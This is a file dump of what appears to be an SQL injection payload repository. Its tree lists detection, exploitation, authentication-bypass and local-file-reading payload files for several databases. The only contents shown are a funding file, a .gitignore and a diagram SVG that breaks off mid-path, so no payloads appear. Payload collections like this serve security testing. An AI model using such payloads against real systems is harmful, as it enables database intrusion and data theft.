├── .github
└── FUNDING.yml
├── .gitignore
├── Image
└── sql-injection.svg
├── Intruder
├── detect
│ ├── GenericBlind.txt
│ ├── Generic_ErrorBased.txt
│ ├── Generic_SQLI.txt
│ ├── Generic_TimeBased.txt
│ ├── Generic_UnionSelect.txt
│ ├── MSSQL
│ │ ├── MSSQL.txt
│ │ └── MSSQL_blind.txt
│ ├── MySQL
│ │ ├── MySQL.txt
│ │ └── MySQL_MSSQL.txt
│ ├── NoSQL
│ │ └── no-sql.txt
│ ├── Oracle
│ │ └── oracle.txt
│ └── xPlatform
│ │ └── xplatform.txt
├── exploit
│ ├── Auth_Bypass.txt
│ ├── DB2
│ │ └── db2-enumeration.txt
│ ├── MSSQL
│ │ └── ms-sql-enumeration.txt
│ ├── MySQL
│ │ ├── mysql-injection-login-bypass.txt
│ │ └── mysql-read-local-files.txt
│ └── PostgresSQL
│ │ └── postgres-enumeration.txt
└── payloads-sql-blind
│ ├── MSSQL
│ ├── payloads-sql-blind-MSSQL-INSERT.txt
│ └── payloads-sql-blind-MSSQL-WHERE.txt
│ └── MySQL
│ ├── payloads-sql-blind-MySQL-INSERT.txt
│ ├── payloads-sql-blind-MySQL-ORDER_BY.txt
│ └── payloads-sql-blind-MySQL-WHERE.txt
├── LICENSE
└── README.md
/.github/FUNDING.yml:
--------------------------------------------------------------------------------
1 | # These are supported funding model platforms
2 |
3 | github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2]
4 | patreon: ismailtasdelen
5 | open_collective: # Replace with a single Open Collective username
6 | ko_fi: # Replace with a single Ko-fi username
7 | tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
8 | community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
9 | liberapay: # Replace with a single Liberapay username
10 | issuehunt: # Replace with a single IssueHunt username
11 | otechie: # Replace with a single Otechie username
12 | custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2']
13 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | # Node rules:
2 | ## Grunt intermediate storage (http://gruntjs.com/creating-plugins#storing-task-files)
3 | .grunt
4 |
5 | ## Dependency directory
6 | ## Commenting this out is preferred by some people, see
7 | ## https://docs.npmjs.com/misc/faq#should-i-check-my-node_modules-folder-into-git
8 | node_modules
9 |
10 | # Book build output
11 | _book
12 |
13 | # eBook build output
14 | *.epub
15 | *.mobi
16 | *.pdf
17 |
--------------------------------------------------------------------------------
/Image/sql-injection.svg:
--------------------------------------------------------------------------------
1 | <svg xmlns="http://www.w3.org/2000/svg" width="781" height="440" viewBox="0 0 781 440"><title>sql-injection_1</title><rect x="330.09" y="202.19" width="90.36" height="93.16" fill="none" stroke="#ffaf10" stroke-miterlimit="10" stroke-width="2"/><line x1="344.21" y1="221.34" x2="356.68" y2="221.34" fill="none" stroke="#ffaf10" stroke-miterlimit="10" stroke-width="2"/><line x1="365.39" y1="221.34" x2="405.67" y2="221.34" fill="none" stroke="#ffaf10" stroke-miterlimit="10" stroke-width="2"/><line x1="344.21" y1="231.23" x2="356.68" y2="231.23" fill="none" stroke="#ffaf10" stroke-miterlimit="10" stroke-width="2"/><line x1="365.39" y1="231.23" x2="405.67" y2="231.23" fill="none" stroke="#ffaf10" stroke-miterlimit="10" stroke-width="2"/><line x1="344.21" y1="241.12" x2="356.68" y2="241.12" fill="none" stroke="#ffaf10" stroke-miterlimit="10" stroke-width="2"/><line x1="365.39" y1="241.12" x2="405.67" y2="241.12" fill="none" stroke="#ffaf10" stroke-miterlimit="10" stroke-width="2"/><line x1="344.21" y1="251.01" x2="356.68" y2="251.01" fill="none" stroke="#ffaf10" stroke-miterlimit="10" stroke-width="2"/><line x1="365.39" y1="251.01" x2="405.67" y2="251.01" fill="none" stroke="#ffaf10" stroke-miterlimit="10" stroke-width="2"/><line x1="621.92" y1="225.2" x2="638.04" y2="225.2" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="646.74" y1="225.2" x2="659.84" y2="225.2" fill="none" stroke="#ffaf10" stroke-miterlimit="10" stroke-width="2"/><line x1="621.92" y1="235.09" x2="638.04" y2="235.09" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="646.74" y1="235.09" x2="659.84" y2="235.09" fill="none" stroke="#ffaf10" stroke-miterlimit="10" stroke-width="2"/><line x1="621.92" y1="244.98" x2="638.04" y2="244.98" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="646.74" y1="244.98" x2="659.84" y2="244.98" fill="none" stroke="#ffaf10" stroke-miterlimit="10" stroke-width="2"/><line x1="621.92" y1="254.87" x2="638.04" y2="254.87" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="646.74" y1="254.87" x2="659.84" y2="254.87" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="669.24" y1="225.2" x2="695.51" y2="225.2" fill="none" stroke="#ffaf10" stroke-miterlimit="10" stroke-width="2"/><line x1="704.22" y1="225.2" x2="717.32" y2="225.2" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="669.24" y1="235.09" x2="695.51" y2="235.09" fill="none" stroke="#ffaf10" stroke-miterlimit="10" stroke-width="2"/><line x1="704.22" y1="235.09" x2="717.32" y2="235.09" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="669.24" y1="244.98" x2="695.51" y2="244.98" fill="none" stroke="#ffaf10" stroke-miterlimit="10" stroke-width="2"/><line x1="704.22" y1="244.98" x2="717.32" y2="244.98" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="669.24" y1="254.87" x2="695.51" y2="254.87" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="704.22" y1="254.87" x2="717.32" y2="254.87" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="621.92" y1="185.24" x2="638.04" y2="185.24" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="646.74" y1="185.24" x2="659.84" y2="185.24" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="621.92" y1="195.13" x2="638.04" y2="195.13" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="646.74" y1="195.13" x2="659.84" y2="195.13" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="621.92" y1="205.02" x2="638.04" y2="205.02" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="646.74" y1="205.02" x2="659.84" y2="205.02" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="621.92" y1="214.91" x2="638.04" y2="214.91" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="646.74" y1="214.91" x2="659.84" y2="214.91" fill="none" stroke="#ffaf10" stroke-miterlimit="10" stroke-width="2"/><line x1="669.24" y1="185.24" x2="695.51" y2="185.24" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="704.22" y1="185.24" x2="717.32" y2="185.24" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="669.24" y1="195.13" x2="695.51" y2="195.13" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="704.22" y1="195.13" x2="717.32" y2="195.13" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="669.24" y1="205.02" x2="695.51" y2="205.02" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="704.22" y1="205.02" x2="717.32" y2="205.02" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="669.24" y1="214.91" x2="695.51" y2="214.91" fill="none" stroke="#ffaf10" stroke-miterlimit="10" stroke-width="2"/><line x1="704.22" y1="214.91" x2="717.32" y2="214.91" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="621.92" y1="264.77" x2="638.04" y2="264.77" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="646.74" y1="264.77" x2="659.84" y2="264.77" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="621.92" y1="274.66" x2="638.04" y2="274.66" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="646.74" y1="274.66" x2="659.84" y2="274.66" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="621.92" y1="284.55" x2="638.04" y2="284.55" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="646.74" y1="284.55" x2="659.84" y2="284.55" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="669.24" y1="264.77" x2="695.51" y2="264.77" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="704.22" y1="264.77" x2="717.32" y2="264.77" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="669.24" y1="274.66" x2="695.51" y2="274.66" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="704.22" y1="274.66" x2="717.32" y2="274.66" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="669.24" y1="284.55" x2="695.51" y2="284.55" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="704.22" y1="284.55" x2="717.32" y2="284.55" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><path d="M628,262.8c0,9.34-.16,4.29-.29,10.55-.16,7.29-20.83,13.21-46.52,13.21s-46.52-5.92-46.52-13.21c0-3.19.29-7.85.29-10.55" fill="#d0f1f7" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><ellipse cx="581.45" cy="262.8" rx="46.52" ry="13.22" fill="#fff" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><path d="M628,241.6c0,9.34-.16,4.29-.29,10.55-.16,7.29-20.83,13.21-46.52,13.21s-46.52-5.92-46.52-13.21c0-3.19.29-7.85.29-10.55" fill="#d0f1f7" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><ellipse cx="581.45" cy="241.6" rx="46.52" ry="13.22" fill="#fff" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><path d="M628,219.74c0,9.34-.16,4.28-.29,10.54-.16,7.3-20.83,13.22-46.52,13.22s-46.52-5.92-46.52-13.22c0-3.18.29-7.85.29-10.54" fill="#d0f1f7" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><ellipse cx="581.45" cy="219.74" rx="46.52" ry="13.22" fill="#fff" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><path d="M628,196.84c0,9.34-.16,4.28-.29,10.54-.16,7.3-20.83,13.22-46.52,13.22s-46.52-5.92-46.52-13.22c0-3.18.29-7.85.29-10.54" fill="#d0f1f7" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><ellipse cx="581.45" cy="196.84" rx="46.52" ry="13.22" fill="#fff" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><path d="M94.13,146.34c-3.69-.58-2.75,3.59-3.06,10.83a9.1,9.1,0,0,0,3.83,8.19" fill="none" stroke="#4c5054" stroke-miterlimit="10" stroke-width="2"/><path d="M106.57,150.42c-5.5,3.25-5.92,8.44-5.17,14.56.21,1.69-5.33-1-9,1.35-4.25,15.4,9.17,18.59,9.17,20.59v10.61c0,4.62,15.25,15.64,28.25,15.64s26.75-13,26.75-15.64-.25-6.86,0-10.86c9.75-4.5,11-19.75,8.25-20.34a28.67,28.67,0,0,0-7.75-.84c0-7.42-1.75-14.79-9.75-14.79h-34.5c-11.64,0-17.24-2.48-19.8-5.45a8,8,0,0,1-2-5.33c0-4.5,4.75-6.1-2.42-10.86,4-1.16,13,.47,14.92,5,1.87-3.53,7.47-14.15,1.75-20,5.25,1.75,14.42,10.58,12.83,20.75,5.58-4.75,9.57-19.63,8.08-23.71,6.64,5.21,10.1,16.71,8.43,25.83,4.75-.16,12.41-8.62,10.11-19.62,6,6.75,10.09,14,8.28,22.31,5.27,1.44,8.41-4.56,9.27-9.56,8.84,21.12-.27,35.72-.27,35.72" fill="none" stroke="#4c5054" stroke-miterlimit="10" stroke-width="2"/><path d="M112.57,208.1a63,63,0,0,1,0,13.07c-.75,7.25-10.75,8-25,11-8.58,1.16-26.25,36.75-26.25,50.56,0,6.5,18.71,40.33,18.71,40.33" fill="none" stroke="#4c5054" stroke-miterlimit="10" stroke-width="2"/><path d="M145.1,208.1a63,63,0,0,0,0,13.07c.75,7.25,10.75,8,25,11,16.89,6.54,24.21,43.32,27.56,55.15-1.83,10-19.2,35.74-19.2,35.74" fill="none" stroke="#4c5054" stroke-miterlimit="10" stroke-width="2"/><path d="M128.58,228.92c.4,0,.79,0,1.17,0,7.5-.16,11.72-1.91,16-5.36,2.33,2.6,6.85,6.12,8.94,5.37s-11.14,9.75-26.15,8.75-21-5.19-23.26-9.47c2.89-1.23,5.89-2.27,6.57-4.65C116.12,228.17,123.07,229.25,128.58,228.92Z" fill="#4c5054" stroke="#4c5054" stroke-miterlimit="10" stroke-width="2"/><polygon points="166.42 258.38 94.75 258.38 94.57 247.87 166.42 246.83 166.42 258.38" fill="#4c5054"/><polygon points="169.32 271.43 91.27 271.43 91.06 267.86 168.19 267.86 169.32 271.43" fill="#4c5054"/><path d="M100.69,164.44c4.91-2.16,18.86,0,27.85,5.29,5.57-5.75,22.86-7.92,28.8-5.55a2.11,2.11,0,0,0,.92,1.66c-3.55,1.39-9.55,10-14.82,11.31-2.36.58-13.66-2.05-16-1.56a59.09,59.09,0,0,1-13.25,1.46c-6.48.19-13.48-10.73-13.48-10.73Z" fill="#4c5054" stroke="#4c5054" stroke-miterlimit="10" stroke-width="2"/><polyline points="183.14 315.78 191.59 315.78 178.44 343.53 80.64 343.53 65.58 315.78 74.96 315.78" fill="none" stroke="#4c5054" stroke-miterlimit="10" stroke-width="2"/><polygon points="72.02 271.23 186.47 271.23 175.29 343.53 83.19 343.53 72.02 271.23" fill="#fff" stroke="#4c5054" stroke-miterlimit="10" stroke-width="2"/><polyline points="65.58 315.78 80.64 347.76 178.44 347.76 191.59 315.78" fill="none" stroke="#4c5054" stroke-miterlimit="10" stroke-width="2"/><path d="M127.4,192c-1.83.17-6.83,2.1-9.25,1.27" fill="#4c5054" stroke="#4c5054" stroke-miterlimit="10" stroke-width="2"/><path d="M129.49,192c1.83,0,6.25,2.23,9.25,1.48" fill="#4c5054" stroke="#4c5054" stroke-miterlimit="10" stroke-width="2"/><line x1="124.02" y1="199" x2="133.14" y2="199" fill="none" stroke="#4c5054" stroke-miterlimit="10" stroke-width="2"/><path d="M77.3,244.15c2.85,5.6,15.23,14.06,17.45,14.23s2.9-9.74,2.9-9.74C90.22,244.86,84.82,240.5,83,235.5Z" fill="#4c5054"/><path d="M71.27,252.63c4.63,5.92,24.13,16.79,26.38,16.2-.5,1.59-2.91,2.6-3.75,2.6.34.36-17.25-.93-17.25-.93s-11-5.4-10-7.84C67.81,259.85,71.68,252.58,71.27,252.63Z" fill="#4c5054"/><path d="M62.36,275.49c1.42,1.17,9.58,4.32,10.94,4-.06.8,1.1,9.64,1.1,9.64s-11.23.48-12.82-1.85C61.82,284.5,62.36,275.49,62.36,275.49Z" fill="#4c5054"/><path d="M67.86,299.64c5.4.09,8.33-1.41,8.19-2.29s1.17,7.56,1.17,7.56,3.6,4.2-4.32,4.78C70.16,307.15,67.86,299.64,67.86,299.64Z" fill="#4c5054"/><path d="M181.94,244.15c-2.86,5.6-13.3,14.06-15.52,14.23s-5.84-8.83-5.84-8.83c7.5-2.17,13.84-9.05,15.63-14.05Z" fill="#4c5054"/><path d="M187.22,253.83c-4.64,5.92-19.64,15.17-21.89,14.59.51,1.58-.83,3,0,3-.33.36,17.25-.93,17.25-.93s9.25-4.45,8.25-6.88C189.68,260.8,186.8,253.78,187.22,253.83Z" fill="#4c5054"/><path d="M194.67,276.25c-1.42,1.17-7.38,3.56-8.73,3.28.06.8-1.11,9.64-1.11,9.64s11.24.48,12.83-1.85C197.42,284.5,194.67,276.25,194.67,276.25Z" fill="#4c5054"/><path d="M192.89,299.08c-5.39.1-9.84-.85-9.71-1.73s-1.17,7.56-1.17,7.56-2.56,3.45,5.36,4C190.11,306.4,192.89,299.08,192.89,299.08Z" fill="#4c5054"/><polyline points="298.82 278.19 278.54 278.19 278.54 192.72 267.34 192.72 267.34 136.24 254.52 136.24 254.52 97.58 242.72 97.58 242.72 109.33 272.57 109.33 272.57 44.91" fill="none" stroke="#cbd0d1" stroke-miterlimit="10"/><polyline points="185.94 279.53 220.32 279.53 220.32 165.36 207.32 165.36 207.32 179.57 227.98 179.57 227.98 117.91 173.65 117.91 173.65 92.91 193.96 92.91 193.96 79.83 54.19 79.83 54.19 53.02" fill="none" stroke="#cbd0d1" stroke-miterlimit="10"/><polyline points="581.15 192.8 581.15 145.99 572.32 145.99 572.32 160.11 598.65 160.11 598.65 111.11" fill="none" stroke="#cbd0d1" stroke-miterlimit="10"/><polyline points="448.65 277.99 465.91 277.99 465.91 210.05 494.35 210.05 494.35 181.32 478.35 181.32 478.82 148.76 496.32 148.76 496.32 119.58" fill="none" stroke="#cbd0d1" stroke-miterlimit="10"/><polyline points="736.9 230.64 755.51 230.64 755.51 341.09 506.33 342.76 464.01 343.05 464.01 309.69 453.35 309.69" fill="none" stroke="#d60000" stroke-miterlimit="10"/><rect x="344.21" y="267.16" width="63.05" height="19.82" fill="#fcf1e0"/><polygon points="214.32 249.03 220.32 240.22 226.32 249.22 214.32 249.03" fill="#cbd0d1"/><polygon points="294.51 271.99 303.32 277.99 294.32 283.99 294.51 271.99" fill="#cbd0d1"/><polygon points="284.57 203.79 278.57 212.6 272.57 203.6 284.57 203.79" fill="#cbd0d1"/><polygon points="459.91 247.81 465.91 239 471.91 248 459.91 247.81" fill="#cbd0d1"/><polygon points="587.3 188.49 581.3 197.3 575.3 188.3 587.3 188.49" fill="#cbd0d1"/><polygon points="761.32 318.02 755.32 326.83 749.32 317.83 761.32 318.02" fill="#d60000"/><polygon points="528.65 349.05 519.84 343.05 528.84 337.05 528.65 349.05" fill="#d60000"/><line x1="621.92" y1="294.49" x2="638.04" y2="294.49" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="646.74" y1="294.49" x2="659.84" y2="294.49" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="621.92" y1="304.38" x2="638.04" y2="304.38" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="646.74" y1="304.38" x2="659.84" y2="304.38" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="669.24" y1="294.49" x2="695.51" y2="294.49" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="704.22" y1="294.49" x2="717.32" y2="294.49" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="669.24" y1="304.38" x2="695.51" y2="304.38" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="704.22" y1="304.38" x2="717.32" y2="304.38" fill="none" stroke="#60bcd8" stroke-miterlimit="10" stroke-width="2"/><line x1="723.77" y1="225.2" x2="736.87" y2="225.2" fill="none" stroke="#d60000" stroke-miterlimit="10" stroke-width="2"/><line x1="723.77" y1="235.09" x2="736.87" y2="235.09" fill="none" stroke="#d60000" stroke-miterlimit="10" stroke-width="2"/><line x1="723.77" y1="244.98" x2="736.87" y2="244.98" fill="none" stroke="#d60000" stroke-miterlimit="10" stroke-width="2"/><line x1="723.77" y1="254.87" x2="736.87" y2="254.87" fill="none" stroke="#d60000" stroke-miterlimit="10" stroke-width="2"/><line x1="723.77" y1="195.13" x2="736.87" y2="195.13" fill="none" stroke="#d60000" stroke-miterlimit="10" stroke-width="2"/><line x1="723.77" y1="205.02" x2="736.87" y2="205.02" fill="none" stroke="#d60000" stroke-miterlimit="10" stroke-width="2"/><line x1="723.77" y1="214.91" x2="736.87" y2="214.91" fill="none" stroke="#d60000" stroke-miterlimit="10" stroke-width="2"/><line x1="723.77" y1="264.77" x2="736.87" y2="264.77" fill="none" stroke="#d60000" stroke-miterlimit="10" stroke-width="2"/><line x1="723.77" y1="274.66" x2="736.87" y2="274.66" fill="none" stroke="#d60000" stroke-miterlimit="10" stroke-width="2"/><line x1="723.77" y1="284.55" x2="736.87" y2="284.55" fill="none" stroke="#d60000" stroke-miterlimit="10" stroke-width="2"/><line x1="723.77" y1="294.49" x2="736.87" y2="294.49" fill="none" stroke="#d60000" stroke-miterlimit="10" stroke-width="2"/><polyline points="723.77 185.24 736.87 185.24 736.87 304.38 723.77 304.38" fill="none" stroke="#d60000" stroke-miterlimit="10" stroke-width="2"/><polygon points="457.47 314.94 448.65 308.94 457.65 302.94 457.47 314.94" fill="#d60000"/><polygon points="292.82 322.52 286.82 331.33 280.82 322.33 292.82 322.52" fill="#d60000"/><polygon points="133.79 406.91 124.98 400.91 133.98 394.91 133.79 406.91" fill="#d60000"/><polygon points="40.95 358.11 46.95 349.3 52.95 358.3 40.95 358.11" fill="#d60000"/><rect x="304.51" y="163.35" width="143.11" height="22.57" fill="#fcf1e0" stroke="#ffaf10" stroke-miterlimit="10" stroke-width="2"/><line x1="380.3" y1="174.55" x2="391.2" y2="174.55" fill="none" stroke="#ffaf10" stroke-miterlimit="10" stroke-width="2"/><line x1="396.36" y1="174.55" x2="407.26" y2="174.55" fill="none" stroke="#ffaf10" stroke-miterlimit="10" stroke-width="2"/><line x1="412.31" y1="174.55" x2="423.2" y2="174.55" fill="none" stroke="#ffaf10" stroke-miterlimit="10" stroke-width="2"/><line x1="428.37" y1="174.55" x2="439.26" y2="174.55" fill="none" stroke="#ffaf10" stroke-miterlimit="10" stroke-width="2"/><ellipse cx="325.61" cy="174.64" rx="13.4" ry="5.26" fill="#fff" stroke="#ffaf10" stroke-miterlimit="10" stroke-width="2"/><path d="M360,278.42a2.57,2.57,0,0,1-.18,1,2.15,2.15,0,0,1-.55.75,2.45,2.45,0,0,1-.89.48,4,4,0,0,1-1.2.17,5.4,5.4,0,0,1-1.15-.12,4.56,4.56,0,0,1-1-.37V278.7l.54.25.56.22.56.15a2.75,2.75,0,0,0,.57.05,1.77,1.77,0,0,0,.49-.06.75.75,0,0,0,.33-.18.83.83,0,0,0,.19-.27,1,1,0,0,0,.05-.36.87.87,0,0,0-.09-.4,1.23,1.23,0,0,0-.28-.33,1.81,1.81,0,0,0-.43-.3l-.55-.31c-.17-.09-.37-.2-.58-.33a2.64,2.64,0,0,1-.6-.47,2.6,2.6,0,0,1-.48-.68,2.36,2.36,0,0,1-.19-1,2.55,2.55,0,0,1,.18-1,2.2,2.2,0,0,1,.52-.74,2.25,2.25,0,0,1,.82-.45,3.29,3.29,0,0,1,1.07-.16,3.9,3.9,0,0,1,.59,0c.18,0,.37.06.56.11s.37.11.55.18a5.64,5.64,0,0,1,.58.25l-.56,1.35-.47-.21-.43-.15-.4-.09a2.83,2.83,0,0,0-.41,0,.9.9,0,0,0-.67.23.85.85,0,0,0-.23.62.87.87,0,0,0,.07.37,1,1,0,0,0,.23.3,2.19,2.19,0,0,0,.39.28c.17.1.36.21.6.33s.53.31.77.46a3.15,3.15,0,0,1,.61.52,2,2,0,0,1,.39.64A2.18,2.18,0,0,1,360,278.42Z" fill="#ffaf10"/><path d="M367.74,272.5v5.3a3.5,3.5,0,0,1-.19,1.19,2.56,2.56,0,0,1-1.58,1.59,3.89,3.89,0,0,1-1.39.23,3.66,3.66,0,0,1-1.34-.22,2.47,2.47,0,0,1-1-.61,2.54,2.54,0,0,1-.59-1,3.47,3.47,0,0,1-.21-1.24V272.5h1.74v5.15a2.93,2.93,0,0,0,.09.78,1.38,1.38,0,0,0,.26.53,1.23,1.23,0,0,0,.44.3,1.93,1.93,0,0,0,.62.09,1.26,1.26,0,0,0,1.06-.42,2.12,2.12,0,0,0,.33-1.29V272.5Z" fill="#ffaf10"/><path d="M369.75,272.5h2.4a6.86,6.86,0,0,1,1.36.11,2.9,2.9,0,0,1,1,.35,1.65,1.65,0,0,1,.59.64,2.18,2.18,0,0,1,.2,1,2.27,2.27,0,0,1-.09.65,1.77,1.77,0,0,1-.24.54,1.45,1.45,0,0,1-.4.38,1.55,1.55,0,0,1-.53.21v0a3.47,3.47,0,0,1,.57.19,1.53,1.53,0,0,1,.78.91,2.5,2.5,0,0,1,.11.82,2.44,2.44,0,0,1-.19,1,2.17,2.17,0,0,1-.56.75,2.75,2.75,0,0,1-.9.47,4.26,4.26,0,0,1-1.18.16h-2.9Zm1.74,3.25h.9a2.15,2.15,0,0,0,.55-.06.89.89,0,0,0,.35-.18.61.61,0,0,0,.19-.29,1.09,1.09,0,0,0,.06-.42.74.74,0,0,0-.29-.67,1.64,1.64,0,0,0-.93-.21h-.83Zm0,1.38v2.13h1a1.66,1.66,0,0,0,.58-.08.86.86,0,0,0,.58-.57,1.7,1.7,0,0,0,.06-.46,1.33,1.33,0,0,0-.06-.42.69.69,0,0,0-.21-.32,1,1,0,0,0-.39-.21,2.06,2.06,0,0,0-.6-.07Z" fill="#ffaf10"/><path d="M380.43,280.7l-1.8-6.44h-.05c0,.35,0,.68.05,1,0,.14,0,.28,0,.43s0,.29,0,.43,0,.28,0,.41v4.17h-1.55v-8.2h2.37l1.77,6.27h0l1.89-6.27h2.36v8.2h-1.62v-4.21c0-.13,0-.26,0-.4s0-.28,0-.42,0-.28,0-.41c0-.32,0-.64,0-1h0l-2,6.42Z" fill="#ffaf10"/><path d="M390.68,280.7H387v-1l1-.46v-5.31l-1-.46v-1h3.73v1l-1,.46v5.31l1,.46Z" fill="#ffaf10"/><path d="M395.08,280.7h-1.74v-6.76h-2.06V272.5h5.85v1.44h-2.05Z" fill="#ffaf10"/><polyline points="80.82 334.08 46.95 334.08 46.95 379.59 71.72 379.59 71.72 401.74" fill="none" stroke="#d60000" stroke-miterlimit="10"/><polyline points="304.01 309.69 286.82 309.69 286.82 349.3 210.65 349.3 210.65 400.91 71.72 401.74" fill="none" stroke="#d60000" stroke-miterlimit="10"/><path d="M142.4,312.15l.35-.07h0c.35-.06.69-.1,1-.14l.18,0,.37-.05h0l.33-.06h0a3.84,3.84,0,0,0,.79-.25,1.72,1.72,0,0,0,.87-.93,1.32,1.32,0,0,0-.54-1.75,2.21,2.21,0,0,0-.06-.62,1.6,1.6,0,0,0-1.12-1.31,2,2,0,0,0-.41-.05,1.91,1.91,0,0,0-1.5.83,4.72,4.72,0,0,1-1.44,1.14l-.74.35v0l-.52.24c-.48.22-1,.45-1.52.68.28-4.33,2.21-8,.17-10.8s-5.8-3.51-9.39-3.58h-.86a16.61,16.61,0,0,0-5.31.89l-.19.07a7.78,7.78,0,0,0-3.44,2.48c-1.68,2.22-.41,4.93.29,8.05l.08.36a13,13,0,0,1,.3,2.36,4.51,4.51,0,0,1,0,.52v.05a4.94,4.94,0,0,0,.57,2.37,32.9,32.9,0,0,0-4.77-1.76c-1.93-.5-3.56-.19-3.66-1.83a.91.91,0,0,1,.68-.72,1.33,1.33,0,0,0,.5.65,1.46,1.46,0,0,1,.38-2.39c1.25-.24,1.18,1,2.93,2,1,.52,2.11,1.09,3.37,1.68v0a4.34,4.34,0,0,0,0-.51c-1.17-.55-2.24-1.09-3.12-1.57a3.87,3.87,0,0,1-.54-.34l-.15-.12a6.6,6.6,0,0,1-.7-.72,1.94,1.94,0,0,0-1.47-.9,2.12,2.12,0,0,0-.42,0,1.63,1.63,0,0,0-1.17,1.26,2.7,2.7,0,0,0-.08.62,1.36,1.36,0,0,0-.72,1.1,1.8,1.8,0,0,0,1,1.59,5.46,5.46,0,0,0,1.73.45c.44.07.89.14,1.37.26a39,39,0,0,1,5.36,2h0a10.22,10.22,0,0,0,1.75,1.78l.08.06.31.26.18.18-.12.05-.83.29-.11,0a37.68,37.68,0,0,1-5,1.4,24.75,24.75,0,0,1-2.69.31,6.74,6.74,0,0,0-2.14.34,1.76,1.76,0,0,0-1.08,1.64,2,2,0,0,0,.46,1.41,1.61,1.61,0,0,0,.74.49,2.22,2.22,0,0,0,0,.73,1.57,1.57,0,0,0,.94,1.21,2.54,2.54,0,0,0,.88.19,1.44,1.44,0,0,0,.59-.09l.36-.16a6.06,6.06,0,0,0,1-.84,10.31,10.31,0,0,1,2.32-1.81,29.58,29.58,0,0,1,4.15-1.87l1-.39.44-.15h0l.36-.13.09,0s.47.45.63.56a5.93,5.93,0,0,0,3.53.92c2.12,0,3.25-.52,4-1.26h0c1.18.48,2.36,1,3.45,1.49.49.23,1.77.92,1.77.92l.57.34a10.94,10.94,0,0,1,2.25,1.9c.61.65,1.1,1.16,1.91,1.17a2.26,2.26,0,0,0,.88-.16,1.49,1.49,0,0,0,.84-.74,2.06,2.06,0,0,0,.2-.65,2.9,2.9,0,0,0,0-.51h0l0,0a1.61,1.61,0,0,0,.71-.44,2,2,0,0,0,.52-1.39,1.77,1.77,0,0,0-1-1.68,6.78,6.78,0,0,0-2.11-.43l-.47,0-.75-.09-.28,0v0c-.37-.06-.76-.13-1.18-.23a28.56,28.56,0,0,1-3.26-1l-.77-.28-1.79-.69h0a.91.91,0,0,1,.18-.21,7.57,7.57,0,0,1,.72-.53c.36-.25,1.34-1.05,1.34-1.05a5.07,5.07,0,0,0,.61-.68h0l1-.38.11,0c.59-.22,1.17-.42,1.71-.6l.08,0C141.15,312.46,